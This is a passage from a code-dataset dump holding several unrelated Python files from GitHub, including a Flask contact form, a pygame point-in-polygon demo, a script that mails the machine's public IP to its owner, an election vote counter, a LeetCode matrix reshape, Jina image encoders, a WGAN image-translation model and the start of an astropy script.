cls.query.filter_by(email=email).first()\n        if message:\n            message.name = name\n            message.email = email\n            message.textarea = textarea\n        else:\n            message = cls(name, email, textarea)\n        db.session.add(message)\n        db.session.commit()\n\n    @classmethod\n    def rm(cls, id):\n        message = cls.query.filter_by(id=id).first()\n        db.session.delete(message)\n        db.session.commit()\n\n    @classmethod\n    def get(cls, id):\n        return cls.query.filter_by(id=id).first()\n\n\nclass FormName(FlaskForm):\n    name = StringField(\"Name\")\n    email = StringField(\"Email\", [DataRequired(), length(max=100, min=5), Email(\"Field should be real Email\")])\n    textarea = TextAreaField(\"Message\", [DataRequired(), length(min=5)])\n    submit = SubmitField(\"Send\")\n\n\n@app.route('/')\ndef home():\n    return render_template('page.html')\n\n\n@app.route('/about_us')\ndef about():\n    resp = requests.get(\"https://jsonplaceholder.typicode.com/users\")\n    data = json.loads(resp.text)\n    return render_template('about.html', data=data)\n\n\n@app.route('/contact_us', methods=['GET', 'POST'])\ndef contact():\n    form = FormName(request.form)\n    if form.validate_on_submit():\n        email = form.email.data\n        name = form.name.data\n        textarea = form.textarea.data\n        FormModel.save(name, email, textarea)\n    return render_template('contact.html', form=form)\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"UnilabEdu/UnilabPythonInternship","sub_path":"Chapter07_Database/Projects/2021/David_chincharashvili/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"18839368036","text":"# Script to explore finding if a point is in a polygon.\n\n# Video Walkthrough Link: https://www.youtube.com/watch?v=TA8XQgiao4M\n\nimport pygame\nfrom random import randint\n\n# Functions for determining if a point is inside a polygon.\ndef is_between(value, y1, y2):\n\tif ((y1 > y2 and y1 >= value > y2) or\n\t\ty2 >= value > y1):\n\t\treturn True\n\treturn False\n\ndef calc_intersection(point, side_a, side_b):\n\tm = (side_b[1]-side_a[1])/(side_b[0]-side_a[0])\n\tx = ((point[1]-side_a[1])/m) + side_a[0]\n\ty = point[1]\n\treturn (x, y)\n\ndef is_inside(point, polygon):\n\tcount = 0\n\tfor i in range(0, len(polygon)):\n\t\ta = polygon[i-1]\n\t\tb = polygon[i]\n\t\tif (a[1] != b[1] and\n\t\t\tis_between(point[1], a[1], b[1])):\n\t\t\tintersection = calc_intersection(point, a, b)\n\t\t\tif intersection[0] >= point[0]:\n\t\t\t\tcount += 1\n\tif count % 2 == 0:\n\t\treturn False\n\treturn True\n\n\n# The main program loop.\ndef main():\n\tpygame.init()\n\tWIDTH, HEIGHT = 500, 500\n\tscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\tclock = pygame.time.Clock()\n\n\tbg = pygame.Surface((WIDTH, HEIGHT))\n\tbg.fill((20,20,20))\n\n\tpoly = [(250, 100), (400, 200), (350, 360),\n\t\t\t\t(150, 360), (100, 200)]\n\n\trandom_points = []\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\texit()\n\n\t\t# Displaying the background surface.\n\t\tscreen.blit(bg, (0, 0))\n\n\t\t# \n\t\tfor point in random_points:\n\t\t\tif is_inside(point, poly):\n\t\t\t\tpygame.draw.circle(screen, (255,50,50), point, 2)\n\t\t\telse:\n\t\t\t\tpygame.draw.circle(screen, (255,255,100), point, 2)\n\n\t\t# Draw polygon.\n\t\tfor x in range(0, len(poly)):\n\t\t\tpygame.draw.aaline(screen, (255,255,255), poly[x], poly[x-1])\n\n\t\tx = randint(0, WIDTH)\n\t\ty = randint(0, 
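The `save` classmethods in the Flask record above all repeat the same look-up-then-update-or-insert dance. The pattern can be written once; a self-contained SQLAlchemy sketch (the `Contact` model and field names here are illustrative, not the app's):

```python
from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.orm import declarative_base, Session

Base = declarative_base()

class Contact(Base):  # illustrative model, not the app's
    __tablename__ = "contacts"
    id = Column(Integer, primary_key=True)
    email = Column(String, unique=True)
    name = Column(String)

def upsert(session, model, lookup, **values):
    # find a row matching `lookup`; update it if present, insert otherwise
    obj = session.query(model).filter_by(**lookup).first()
    if obj is None:
        obj = model(**lookup, **values)
        session.add(obj)
    else:
        for key, val in values.items():
            setattr(obj, key, val)
    session.commit()
    return obj

engine = create_engine("sqlite:///:memory:")
Base.metadata.create_all(engine)
with Session(engine) as session:
    upsert(session, Contact, {"email": "a@b.c"}, name="Alice")
    upsert(session, Contact, {"email": "a@b.c"}, name="Alicia")  # updates, no duplicate
    print(session.query(Contact).count())  # 1
```

The same helper would back `UserModel.save`, `Location.save`, and `FormModel.save` with one line each.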
HEIGHT)\n\t\trandom_points.append((x,y))\n\n\t\tpygame.display.update()\n\t\tclock.tick(30)\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"EruditeCode/game_functions","sub_path":"point_in_polygon.py","file_name":"point_in_polygon.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38827555539","text":"'''\r\nSend an email testing\r\n'''\r\n\r\nimport smtplib\r\nfrom urllib.request import urlopen\r\nimport datetime as dt\r\nimport time\r\n\r\n'''\r\n---mail of the receiver\r\n---mail of the sender\r\n---password mail of the sender\r\n'''\r\n\r\nRECEIVER = \"\"\r\nMAIL = \"\"\r\nPWD = \"\"\r\n\r\n# run with pythonw\r\n# Send an email at a fixed hour of the day running as a background task\r\n\r\nwhile True:\r\n    if dt.datetime.today().hour == 21:\r\n        ip = urlopen(\"https://ip.42.pl/raw\").read()\r\n\r\n        server = smtplib.SMTP('smtp.gmail.com', 587)\r\n        server.starttls()\r\n        server.login(MAIL, PWD)\r\n\r\n        msg = f\"the IP address is {ip.decode('utf-8')}\"\r\n        # from mail - to mail - msg\r\n        server.sendmail(MAIL, RECEIVER, msg)\r\n\r\n        server.quit()\r\n\r\n        # after sending one message, sleep for an hour\r\n        time.sleep(60*60)\r\n","repo_name":"jameszaupa/Public-IP-to-your-Mail","sub_path":"public_ip_to_mail.pyw","file_name":"public_ip_to_mail.pyw","file_ext":"pyw","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32166574792","text":"import os\nimport csv\n\ntotal_votes = 0\n\n#dictionary for vote count per candidate\nvote_count = {}\n\n#path to get data from election_data.csv and outputting it to a text file\nelection_data = os.path.join('..','PyPoll','election_data.csv')\noutput_text = os.path.join(\"PyPoll.txt\")\n\n#reader for election_data.csv\nwith open(election_data, 'r') as csvfile:\n    csv_reader = csv.reader(csvfile, delimiter=',')\n    header = next(csv_reader)\n    \n    #loop through rows in election_data.csv, skipping the header \n    for row in csv_reader:\n        \n        #add up total votes\n        total_votes = total_votes + 1\n        \n        #if statement that counts the votes per candidate\n        if row[2] in vote_count:\n            vote_count[row[2]]+=1\n        \n        else:\n            vote_count[row[2]] = 1\n        \n        \n#print results to shell \nprint(\"Election Results\")\nprint(\"------------------------------\")\nprint(\"Total Votes: \" + str(total_votes))\nprint(\"------------------------------\")\n\n#for statement that prints name, vote % and vote count by using a key/value pairing from the dictionary\n#.items() returns the sequence of tuples in vote_count\nfor key, value in vote_count.items():\n    print(key + \": \" + '%.3f' %(vote_count.get(key) * 100/ total_votes) + \"% (\" + str(value) +\")\")\nprint(\"------------------------------\")\n\n\n#print the winner by finding the max # of votes in the vote count dictionary \nprint(\"Winner: \" + max(vote_count, key = vote_count.get))\nprint(\"------------------------------\")\n\n\n#write the answers to a text file \nfile = open(output_text, \"w\")\nfile.write(\"Election Results\\n\")\nfile.write(\"------------------------------\\n\")\nfile.write(\"Total Votes: \" + str(total_votes) + \"\\n\")\nfile.write(\"------------------------------\\n\")\nfor key, value in vote_count.items():\n    file.write(key + \": \" + '%.3f' %(vote_count.get(key) * 100/ total_votes) + \"% (\" + str(value) +\")\\n\")\nfile.write(\"------------------------------\\n\")\nfile.write(\"Winner: \" + max(vote_count, key = vote_count.get) + 
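A caveat in the point-in-polygon record above: `calc_intersection` computes a slope, so a perfectly vertical edge (`side_a[0] == side_b[0]`) raises ZeroDivisionError — the demo pentagon just happens to avoid that case. The usual even-odd ray-casting formulation interpolates the crossing x directly and has no such blow-up; a sketch:

```python
# Standard even-odd ray casting; interpolates the crossing x without a slope term,
# so vertical edges are handled naturally.
def point_in_polygon(point, polygon):
    px, py = point
    inside = False
    for i in range(len(polygon)):
        ax, ay = polygon[i - 1]
        bx, by = polygon[i]
        if (ay > py) != (by > py):  # edge straddles the horizontal ray; by != ay here
            cross_x = ax + (py - ay) * (bx - ax) / (by - ay)
            if cross_x >= px:
                inside = not inside
    return inside

poly = [(250, 100), (400, 200), (350, 360), (150, 360), (100, 200)]
print(point_in_polygon((250, 200), poly))  # True
print(point_in_polygon((10, 10), poly))    # False
```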
\"\\n\")\nfile.write(\"------------------------------\\n\")\n\nfile.close()","repo_name":"nrdeering/python-challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29976519490","text":"# 在MATLAB中,有一个非常有用的函数 reshape,它可以将一个矩阵重塑为另一个大小不同的新矩阵,但保留其原始数据。 \n# \n# 给出一个由二维数组表示的矩阵,以及两个正整数r和c,分别表示想要的重构的矩阵的行数和列数。 \n# \n# 重构后的矩阵需要将原始矩阵的所有元素以相同的行遍历顺序填充。 \n# \n# 如果具有给定参数的reshape操作是可行且合理的,则输出新的重塑矩阵;否则,输出原始矩阵。 \n# \n# 示例 1: \n# \n# \n# 输入: \n# nums = \n# [[1,2],\n# [3,4]]\n# r = 1, c = 4\n# 输出: \n# [[1,2,3,4]]\n# 解释:\n# 行遍历nums的结果是 [1,2,3,4]。新的矩阵是 1 * 4 矩阵, 用之前的元素值一行一行填充新矩阵。\n# \n# \n# 示例 2: \n# \n# \n# 输入: \n# nums = \n# [[1,2],\n# [3,4]]\n# r = 2, c = 4\n# 输出: \n# [[1,2],\n# [3,4]]\n# 解释:\n# 没有办法将 2 * 2 矩阵转化为 2 * 4 矩阵。 所以输出原矩阵。\n# \n# \n# 注意: \n# \n# \n# 给定矩阵的宽和高范围在 [1, 100]。 \n# 给定的 r 和 c 都是正数。 \n# \n# Related Topics 数组 \n# 👍 169 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def matrixReshape(self, nums: List[List[int]], r: int, c: int) -> List[List[int]]:\n m, n = len(nums), len(nums[0]) # 原始矩阵的行列\n if m * n != r * c: # 如果新矩阵的行列乘积<>原始矩阵的行列乘积,即不能重塑\n return nums\n # 初始化重塑矩阵\n res = [[0] * c for _ in range(r)]\n row = col = 0\n for i in range(m):\n for j in range(n):\n if col == c:\n row += 1\n col = 0\n res[row][col] = nums[i][j]\n col += 1\n return res\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"CatonChen/study_made_me_happy","sub_path":"leetcode/editor/cn/[566]重塑矩阵.py","file_name":"[566]重塑矩阵.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22642732137","text":"import numpy as np\nfrom keras.applications.resnet import ResNet50, preprocess_input\n\nfrom jina import Executor, requests, DocumentArray\nfrom PIL import Image\nfrom jina.logging.logger import JinaLogger\n\nclass ImageProcessor(Executor):\n def __init__(self, **kwargs):\n super().__init__()\n self.logger = JinaLogger(self.__class__.__name__)\n\n self.enable_rescale = True\n self.rescale_height = 224\n self.rescale_width = 224\n\n # self.enable_normalization = False\n # self.type = 'float32'\n\n def _preprocess(self, blob) -> np.ndarray:\n \n _img = Image.fromarray(blob)\n\n if self.enable_rescale:\n _img = _img.resize((self.rescale_width, self.rescale_height))\n\n _img_blob = np.asarray(_img)\n \n # if self.enable_normalization:\n # _img_blob = (_img_blob / 255).astype(self.type)\n # _img_blob = _img_blob.astype('float32')\n \n _img_blob = preprocess_input(_img_blob) # ResNet50 preprocess_input\n\n\n return _img_blob\n \n @requests\n def process_img(self, docs: DocumentArray, parameters: dict = None, **kwargs):\n docs = DocumentArray(list(filter(lambda doc: doc.modality=='image', docs)))\n\n # Filter image mode which is not 'RGB'\n modes, _ = docs.get_attributes_with_docs('tags__mode')\n s_modes = set(modes)\n if len(s_modes) > 1:\n for each_mode in s_modes:\n if each_mode != 'RGB':\n found_index = np.where(np.array(modes) == each_mode)[0]\n for i in found_index:\n self.logger.warning(f\"Unsupported image mode: {each_mode}; image: '{docs[int(i)].tags__path}'\")\n docs = DocumentArray(list(filter(lambda doc: doc.tags__mode=='RGB', docs)))\n\n # Process data\n for doc in docs:\n \n doc.blob = self._preprocess(doc.blob)\n\n return docs\n\nclass TfModelEncoder(Executor):\n def __init__(self, **kwargs):\n 
super().__init__()\n        self.image_dim = 224\n        self.model = ResNet50(pooling='max', \n                              input_shape=(self.image_dim, self.image_dim, 3),\n                              weights='imagenet')\n\n    # def _resize_images(self, tensors):\n    #     resized_tensors = []\n    #     for t in tensors:\n    #         try:\n    #             resized_tensors.append(tf.keras.preprocessing.image.smart_resize(t, (self.image_dim, self.image_dim)))\n    #         except InvalidArgumentError:\n    #             # this can happen if you include empty or other malformed images\n    #             pass\n    #     return resized_tensors\n\n    @requests\n    def encode(self, docs, **kwargs):\n\n        blobs, _ = docs.get_attributes_with_docs('blob')\n\n        # buffers, docs = docs.get_attributes_with_docs('buffer')\n        # tensors = [tf.io.decode_image(contents=b, channels=3) for b in buffers]\n        # resized_tensors = preprocess_input(np.array(self._resize_images(tensors)))\n        \n        embeds = self.model.predict(np.stack(blobs))\n        for d, b in zip(docs, embeds):\n            d.embedding = b\n","repo_name":"RedCarpG/JINA-image_similarity_search-example","sub_path":"executors/image_encoder.py","file_name":"image_encoder.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"22003496681","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nproducts = {\n    'candy': 10,\n    'juice': 5,\n    'pen': 50\n}\n\ndef check(product,num):\n    if product in products.keys() and products[product] >= num:\n        return True\n    return False\n\n","repo_name":"manehharutyunyan/python-homeworks","sub_path":"HW02/Problem4/Productcheck.py","file_name":"Productcheck.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6096867502","text":"programmer = {\n    \"name\": \"Alice\",\n    \"position\": \"Fullstack Developer\",\n    \"skills\": [\"Python\", \"Git\", \"SQL\", \"HTML\", \"CSS\", \"Javascript\"]\n}\n\n# By default the loop iterates over the keys, but the loop variable could have any name, e.g. attr\nfor key in programmer:\n    print(key)\n\n# We could print the values instead\nfor key in programmer:\n    print(programmer[key]) \n\nfor key, value in programmer.items():\n    print(key, \":\",value) ","repo_name":"karenqueca9/lists_and_dicts","sub_path":"dictionaries/09.looping_dicts.py","file_name":"09.looping_dicts.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24919125678","text":"import collections\r\nfrom utils.functions import *\r\n\r\n\r\ndef generator_deconv(generator_inputs, generator_outputs_channels, a):\r\n    encoder1 = conv(generator_inputs, a.ngf, stride=2, n=1)\r\n    act1 = lrelu(encoder1, a.leak)\r\n    encoder2 = conv(act1, a.ngf * 2, stride=2, n=2)\r\n    encoder2 = batchnorm(encoder2, n=2)\r\n    act2 = lrelu(encoder2, a.leak)\r\n    encoder3 = conv(act2, a.ngf * 4, stride=2, n=3)\r\n    encoder3 = batchnorm(encoder3, n=3)\r\n    act3 = lrelu(encoder3, a.leak)\r\n    encoder4 = conv(act3, a.ngf * 8, stride=2, n=4)\r\n    encoder4 = batchnorm(encoder4, n=4)\r\n    act4 = lrelu(encoder4, a.leak)\r\n    encoder5 = conv(act4, a.ngf * 8, stride=2, n=5)\r\n    encoder5 = batchnorm(encoder5, n=5)\r\n    act5 = lrelu(encoder5, a.leak)\r\n    encoder6 = conv(act5, a.ngf * 8, stride=2, n=6)\r\n    encoder6 = batchnorm(encoder6, n=6)\r\n    act6 = lrelu(encoder6, a.leak)\r\n    encoder7 = conv(act6, a.ngf * 8, stride=2, n=7)\r\n    encoder7 = batchnorm(encoder7, n=7)\r\n    act7 = lrelu(encoder7, a.leak)\r\n    encoder8 = conv(act7, a.ngf * 8, stride=2, n=8)\r\n    encoder8 = 
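The two Jina executors above split the work into resize-plus-`preprocess_input` and a pooled ResNet50 forward pass. One thing worth flagging: Keras only honors the `pooling` argument when `include_top=False`; as constructed above the model keeps its 1000-way classifier head, so the "embeddings" are class scores rather than pooled features. A self-contained sketch of the pooled-feature variant (a random array stands in for a decoded RGB image):

```python
import numpy as np
from keras.applications.resnet import ResNet50, preprocess_input

# include_top=False is what makes pooling='max' take effect (2048-d features)
model = ResNet50(include_top=False, pooling='max',
                 input_shape=(224, 224, 3), weights='imagenet')

# a random uint8 array stands in for a real 224x224 RGB image
img = np.random.randint(0, 256, size=(224, 224, 3), dtype=np.uint8)
batch = preprocess_input(img.astype('float32'))[None, ...]  # add the batch axis

embedding = model.predict(batch)
print(embedding.shape)  # (1, 2048): one embedding per image
```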
batchnorm(encoder8, n=8)\r\n act8 = lrelu(encoder8, a.leak)\r\n decoder8 = deconv(act8, a.ngf * 8, n=8)\r\n decoder8 = batchnorm(decoder8, n=9)\r\n decoder8 = tf.nn.dropout(decoder8, keep_prob=0.5)\r\n act9 = lrelu(tf.concat([decoder8, encoder7], axis=3), a.leak)\r\n decoder7 = deconv(act9, a.ngf * 8, n=7)\r\n decoder7 = batchnorm(decoder7, n=10)\r\n decoder7 = tf.nn.dropout(decoder7, keep_prob=0.5)\r\n act10 = lrelu(tf.concat([decoder7, encoder6], axis=3), a.leak)\r\n decoder6 = deconv(act10, a.ngf * 8, n=6)\r\n decoder6 = batchnorm(decoder6, n=11)\r\n decoder6 = tf.nn.dropout(decoder6, keep_prob=0.5)\r\n act11 = lrelu(tf.concat([decoder6, encoder5], axis=3), a.leak)\r\n decoder5 = deconv(act11, a.ngf * 8, n=5)\r\n decoder5 = batchnorm(decoder5, n=12)\r\n act12 = lrelu(tf.concat([decoder5, encoder4], axis=3), a.leak)\r\n decoder4 = deconv(act12, a.ngf * 4, n=4)\r\n decoder4 = batchnorm(decoder4, n=13)\r\n act13 = lrelu(tf.concat([decoder4, encoder3], axis=3), a.leak)\r\n decoder3 = deconv(act13, a.ngf * 2, n=3)\r\n decoder3 = batchnorm(decoder3, n=14)\r\n act14 = lrelu(tf.concat([decoder3, encoder2], axis=3), a.leak)\r\n decoder2 = deconv(act14, a.ngf, n=2)\r\n decoder2 = batchnorm(decoder2, n=15)\r\n act15 = tf.nn.relu(tf.concat([decoder2, encoder1], axis=3))\r\n decoder1 = deconv(act15, generator_outputs_channels, n=1)\r\n act16 = tf.tanh(decoder1)\r\n return act16\r\n\r\n\r\ndef generator_upsampling(generator_inputs, generator_outputs_channels, a):\r\n encoder1 = conv(generator_inputs, a.ngf, stride=2, n=1)\r\n act1 = lrelu(encoder1, a.leak)\r\n encoder2 = conv(act1, a.ngf * 2, stride=2, n=2)\r\n encoder2 = batchnorm(encoder2, n=2)\r\n act2 = lrelu(encoder2, a.leak)\r\n encoder3 = conv(act2, a.ngf * 4, stride=2, n=3)\r\n encoder3 = batchnorm(encoder3, n=3)\r\n act3 = lrelu(encoder3, a.leak)\r\n encoder4 = conv(act3, a.ngf * 8, stride=2, n=4)\r\n encoder4 = batchnorm(encoder4, n=4)\r\n act4 = lrelu(encoder4, a.leak)\r\n encoder5 = conv(act4, a.ngf * 8, stride=2, n=5)\r\n encoder5 = batchnorm(encoder5, n=5)\r\n act5 = lrelu(encoder5, a.leak)\r\n encoder6 = conv(act5, a.ngf * 8, stride=2, n=6)\r\n encoder6 = batchnorm(encoder6, n=6)\r\n act6 = lrelu(encoder6, a.leak)\r\n encoder7 = conv(act6, a.ngf * 8, stride=2, n=7)\r\n encoder7 = batchnorm(encoder7, n=7)\r\n act7 = lrelu(encoder7, a.leak)\r\n encoder8 = conv(act7, a.ngf * 8, stride=2, n=8)\r\n encoder8 = batchnorm(encoder8, n=8)\r\n act8 = lrelu(encoder8, a.leak)\r\n decoder8 = upsampling(act8, a.ngf * 8, n=8)\r\n decoder8 = batchnorm(decoder8, n=9)\r\n decoder8 = tf.nn.dropout(decoder8, keep_prob=0.5)\r\n act9 = lrelu(tf.concat([decoder8, encoder7], axis=3), a.leak)\r\n decoder7 = upsampling(act9, a.ngf * 8, n=7)\r\n decoder7 = batchnorm(decoder7, n=10)\r\n decoder7 = tf.nn.dropout(decoder7, keep_prob=0.5)\r\n act10 = lrelu(tf.concat([decoder7, encoder6], axis=3), a.leak)\r\n decoder6 = upsampling(act10, a.ngf * 8, n=6)\r\n decoder6 = batchnorm(decoder6, n=11)\r\n decoder6 = tf.nn.dropout(decoder6, keep_prob=0.5)\r\n act11 = lrelu(tf.concat([decoder6, encoder5], axis=3), a.leak)\r\n decoder5 = upsampling(act11, a.ngf * 8, n=5)\r\n decoder5 = batchnorm(decoder5, n=12)\r\n act12 = lrelu(tf.concat([decoder5, encoder4], axis=3), a.leak)\r\n decoder4 = upsampling(act12, a.ngf * 4, n=4)\r\n decoder4 = batchnorm(decoder4, n=13)\r\n act13 = lrelu(tf.concat([decoder4, encoder3], axis=3), a.leak)\r\n decoder3 = upsampling(act13, a.ngf * 2, n=3)\r\n act14 = lrelu(tf.concat([decoder3, encoder2], axis=3), a.leak)\r\n decoder2 = upsampling(act14, 
a.ngf, n=2)\r\n decoder2 = batchnorm(decoder2, n=15)\r\n act15 = tf.nn.relu(tf.concat([decoder2, encoder1], axis=3))\r\n decoder1 = upsampling(act15, generator_outputs_channels, n=1)\r\n act16 = tf.tanh(decoder1)\r\n return act16\r\n\r\n\r\ndef generator(generator_inputs, generator_outputs_channels, a):\r\n if a.upsampling:\r\n return generator_upsampling(generator_inputs, generator_outputs_channels, a)\r\n else:\r\n return generator_deconv(generator_inputs, generator_outputs_channels, a)\r\n\r\n\r\ndef discriminator(disc_inputs, disc_targets, a):\r\n pair = tf.concat([disc_inputs, disc_targets], axis=3)\r\n encoder1 = conv(pair, a.ndf, stride=2, n=1)\r\n act1 = lrelu(encoder1, a.leak)\r\n encoder2 = conv(act1, a.ndf * 2, stride=2, n=2)\r\n encoder2 = batchnorm(encoder2, n=2)\r\n act2 = lrelu(encoder2, a.leak)\r\n encoder3 = conv(act2, a.ndf * 4, stride=2, n=3)\r\n encoder3 = batchnorm(encoder3, n=3)\r\n act3 = lrelu(encoder3, a.leak)\r\n encoder4 = conv(act3, a.ndf * 8, stride=1, n=4)\r\n encoder4 = batchnorm(encoder4, n=4)\r\n act4 = lrelu(encoder4, a.leak)\r\n encoder5 = conv(act4, 1, stride=1, n=5)\r\n act5 = tf.sigmoid(encoder5)\r\n return act5\r\n\r\n\r\ndef create_model(inputs, targets, net1, net2, a):\r\n\r\n with tf.variable_scope(\"generator\"):\r\n out_channels = int(targets.get_shape()[-1])\r\n outputs = generator(inputs, out_channels, a)\r\n\r\n # create two copies of discriminator, one for real pairs and one for fake pairs\r\n # they share the same underlying variables\r\n with tf.name_scope(\"real_discriminator\"):\r\n with tf.variable_scope(\"discriminator\"):\r\n # 2x [batch, height, width, channels] => [batch, 30, 30, 1]\r\n predict_real = discriminator(inputs, targets, a)\r\n\r\n with tf.name_scope(\"fake_discriminator\"):\r\n with tf.variable_scope(\"discriminator\", reuse=True):\r\n # 2x [batch, height, width, channels] => [batch, 30, 30, 1]\r\n predict_fake = discriminator(inputs, outputs, a)\r\n\r\n with tf.name_scope(\"discriminator_loss\"):\r\n # minimizing -tf.log will try to get inputs to 1\r\n # predict_real => 1\r\n # predict_fake => 0\r\n disc_loss = tf.reduce_mean(predict_fake - predict_real)\r\n\r\n with tf.name_scope(\"generator_loss\"):\r\n # predict_fake => 1\r\n # abs(targets - outputs) => 0\r\n gen_loss_GAN = -tf.reduce_mean(predict_fake)\r\n gen_loss_L1 = tf.reduce_mean(tf.abs(targets - outputs))\r\n gen_loss_tv = tf.reduce_mean(tf.sqrt(tf.nn.l2_loss(sum_tv_loss(outputs))))\r\n gen_loss_f = tf.reduce_mean(tf.sqrt(tf.nn.l2_loss(feature_loss(targets, net1) - feature_loss(outputs, net2))))\r\n gen_loss = gen_loss_GAN * a.gan_weight + gen_loss_L1 * a.l1_weight + gen_loss_tv * a.tv_weight + gen_loss_f * a.f_weight\r\n\r\n with tf.name_scope(\"discriminator_train\"):\r\n disc_tvars = [var for var in tf.trainable_variables() if var.name.startswith(\"discriminator\")]\r\n disc_optimizer = tf.train.RMSPropOptimizer(a.lr, a.beta1)\r\n disc_grads_and_vars = disc_optimizer.compute_gradients(disc_loss, var_list=disc_tvars)\r\n disc_train = disc_optimizer.apply_gradients(disc_grads_and_vars)\r\n clip_vars = [tf.assign(var, tf.clip_by_value(var, -0.02, 0.02)) for var in disc_tvars]\r\n tuple_vars = tf.tuple(clip_vars, control_inputs=[disc_train])\r\n\r\n with tf.name_scope(\"generator_train\"):\r\n with tf.control_dependencies(tuple_vars):\r\n gen_tvars = [var for var in tf.trainable_variables() if var.name.startswith(\"generator\")]\r\n gen_optim = tf.train.RMSPropOptimizer(a.lr, a.beta1)\r\n gen_grads_and_vars = gen_optim.compute_gradients(gen_loss, 
var_list=gen_tvars)\r\n gen_train = gen_optim.apply_gradients(gen_grads_and_vars)\r\n\r\n ema = tf.train.ExponentialMovingAverage(decay=0.99)\r\n update_losses = ema.apply([disc_loss, gen_loss_GAN, gen_loss_L1, gen_loss_tv, gen_loss_f])\r\n\r\n global_step = tf.train.get_or_create_global_step()\r\n incr_global_step = tf.assign(global_step, global_step + 1)\r\n\r\n return collections.namedtuple(\"Model\", \"predict_real, predict_fake, \"\r\n \"disc_loss, disc_grads_and_vars, \"\r\n \"gen_loss_GAN, gen_loss_tv, gen_loss_f, gen_loss_L1, gen_grads_and_vars, \"\r\n \"outputs, train\")(\r\n predict_real=predict_real,\r\n predict_fake=predict_fake,\r\n disc_loss=ema.average(disc_loss),\r\n disc_grads_and_vars=disc_grads_and_vars,\r\n gen_loss_GAN=ema.average(gen_loss_GAN),\r\n gen_loss_L1=ema.average(gen_loss_L1),\r\n gen_loss_tv=ema.average(gen_loss_tv),\r\n gen_loss_f=ema.average(gen_loss_f),\r\n gen_grads_and_vars=gen_grads_and_vars,\r\n outputs=outputs,\r\n train=tf.group(update_losses, incr_global_step, gen_train),\r\n )\r\n","repo_name":"irfanICMLL/CoupleGenerator","sub_path":"models/wgan.py","file_name":"wgan.py","file_ext":"py","file_size_in_byte":9600,"program_lang":"python","lang":"en","doc_type":"code","stars":457,"dataset":"github-code","pt":"54"} +{"seq_id":"37753279838","text":"#!/usr/bin/env python3\n\n\n# +\n# import(s)\n# -\nfrom astropy.coordinates import get_moon, get_sun, SkyCoord, EarthLocation, AltAz\nfrom astropy.time import Time\nfrom astropy.utils import iers\nfrom astropy.visualization import astropy_mpl_style\nfrom datetime import datetime, timedelta\n\nimport argparse\nimport astropy.units as u\nimport functools\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport re\nimport warnings\n\n\n# +\n# initialize\n# -\nwarnings.filterwarnings('ignore')\nplt.style.use(astropy_mpl_style)\n\n\n# +\n# function(s)\n# -\ndef get_time(_offset=0):\n return (datetime.now() + timedelta(days=_offset)).isoformat()\n\n\ndef get_utc(_offset=0):\n return (datetime.utcnow() + timedelta(days=_offset)).isoformat()\n\n\ndef utc_to_mjd(_iso=''):\n # noinspection PyBroadException\n try:\n return float(Time(_iso).mjd)\n except Exception:\n return float(math.nan)\n\n\ndef mjd_to_utc(_mjd=0.0):\n # noinspection PyBroadException\n try:\n return Time(_mjd+2400000.5, format='jd', precision=3).isot\n except Exception:\n return None\n\n\ndef time2string(_delta=0.0):\n if not isinstance(_delta, float) or _delta < 0.0:\n return ''\n _limit = [_v for _v in TIME_VALUES if _v <= _delta]\n if _limit:\n _limit = _limit[0]\n else:\n _limit = 1.0\n return f\"{_delta/_limit:.2f} {TIME_SYMBOLS[TIME_VALUES.index(_limit)]}\"\n\n\ndef timeit(func):\n @functools.wraps(func)\n def wrapper(*args_in, **kwargs_in):\n _ts = float(utc_to_mjd(get_utc()))\n print(f'Calling {func.__name__}()')\n try:\n _res = func(*args_in, **kwargs_in)\n except Exception as _e:\n print(f'Failed {func.__name__}(), e={_e}')\n return None\n else:\n print(f'Called {func.__name__}() OK')\n _delta = (float(utc_to_mjd(get_utc())) - _ts) * 86400.0\n print(f' {func.__name__}() took {time2string(_delta)}')\n return _res\n return wrapper\n\n\n# +\n# constant(s)\n# -\nCAT_FILE = 'finals2000A'\nCAT_DATE = utc_to_mjd(get_utc())\niers.IERS_A_URL = 'ftp://cddis.gsfc.nasa.gov/pub/products/iers/{CAT_FILE}.all'\nKUIPER_ALTITUDE = 2510.028\nKUIPER_LATITUDE = 32.4165\nKUIPER_LONGITUDE = -110.7345\nKUIPER = EarthLocation(lat=KUIPER_LATITUDE*u.deg, lon=KUIPER_LONGITUDE*u.deg, height=KUIPER_ALTITUDE*u.m)\nPLOT_TYPES = ['Airmass', 
